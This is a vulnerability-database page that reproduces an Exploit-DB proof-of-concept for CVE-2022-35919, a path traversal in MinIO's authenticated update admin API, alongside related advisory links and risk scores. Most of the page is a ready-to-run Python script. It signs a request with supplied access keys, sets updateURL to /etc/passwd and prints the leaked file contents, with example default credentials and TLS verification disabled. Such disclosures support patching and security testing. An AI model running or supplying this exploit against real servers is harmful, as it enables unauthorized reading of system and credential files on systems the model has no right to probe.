Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Minio 2022-07-29T19-40-48Z - Path traversal

🗓️ 09 Oct 2023 00:00:00Reported by Jenson ZhaoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 397 Views

Minio 2022-07-29T19-40-48Z - Path traversal, Exploit, CVE-2022-35919, Windows 10

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Minio 2022-07-29T19-40-48Z - Path traversal Exploit
9 Oct 202300:00
zdt
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Golang Go and MinIO may affect IBM Spectrum Plus Container Backup and Restore for Kubernetes and Red Hat OpenShift (CVE-2022-29804, CVE-2022-30580, CVE-2022-30629, CVE-2022-30634, CVE-2022-35919, CVE-2022-31028)
17 Sep 202213:44
ibm
AlpineLinux		CVE-2022-35919
1 Aug 202200:00
alpinelinux
Circl		CVE-2022-35919
2 Aug 202207:55
circl
CNNVD		MinIO 路径遍历漏洞
1 Aug 202200:00
cnnvd
CVE		CVE-2022-35919
1 Aug 202200:00
cve
Cvelist		CVE-2022-35919 Authenticated requests for server update admin API allows path traversal in minio
1 Aug 202200:00
cvelist
EUVD		EUVD-2022-38786
3 Oct 202520:07
euvd
NVD		CVE-2022-35919
1 Aug 202222:15
nvd
OSV		BIT-MINIO-2022-35919 Authenticated requests for server update admin API allows path traversal in minio
6 Mar 202410:57
osv
Rows per page
# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal
# Date: 2023-09-02
# Exploit Author: Jenson Zhao
# Vendor Homepage: https://min.io/
# Software Link: https://github.com/minio/minio/
# Version: Up to (excluding) 2022-07-29T19-40-48Z
# Tested on: Windows 10
# CVE : CVE-2022-35919
# Required before execution: pip install minio,requests
import urllib.parse
import requests, json, re, datetime, argparse
from minio.credentials import Credentials
from minio.signer import sign_v4_s3


class MyMinio():
    secure = False

    def __init__(self, base_url, access_key, secret_key):
        self.credits = Credentials(
            access_key=access_key,
            secret_key=secret_key
        )
        if base_url.startswith('http://') and base_url.endswith('/'):
            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
        elif base_url.startswith('https://') and base_url.endswith('/'):
            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'
            self.secure = True
        else:
            print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')

    def poc(self):
        datetimes = datetime.datetime.utcnow()
        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')
        urls = urllib.parse.urlparse(self.url)
        headers = {
            'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
            'X-Amz-Date': datetime_str,
            'Host': urls.netloc,
        }
        headers = sign_v4_s3(
            method='POST',
            url=urls,
            region='',
            headers=headers,
            credentials=self.credits,
            content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',
            date=datetimes,
        )
        if self.secure:
            response = requests.post(url=self.url, headers=headers, verify=False)
        else:
            response = requests.post(url=self.url, headers=headers)
        try:
            message = json.loads(response.text)['Message']
            pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'
            matches = re.findall(pattern, message)
            if matches:
                print('There is CVE-2022-35919 problem with the url!')
                print('The contents of the /etc/passwd file are as follows:')
                for match in matches:
                    print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],
                                                        match[6]))
            else:
                print('There is no CVE-2022-35919 problem with the url!')
                print('Here is the response message content:')
                print(message)
        except Exception as e:
            print(
                'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')
            print(response.text)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")
    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")
    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")
    args = parser.parse_args()
    minio = MyMinio(args.url, args.accesskey, args.secretkey)
    minio.poc()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Oct 2023 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.12.7 - 7.4
EPSS0.13567
SSVC
miniopath traversalexploitcve-2022-35919windows 10security
397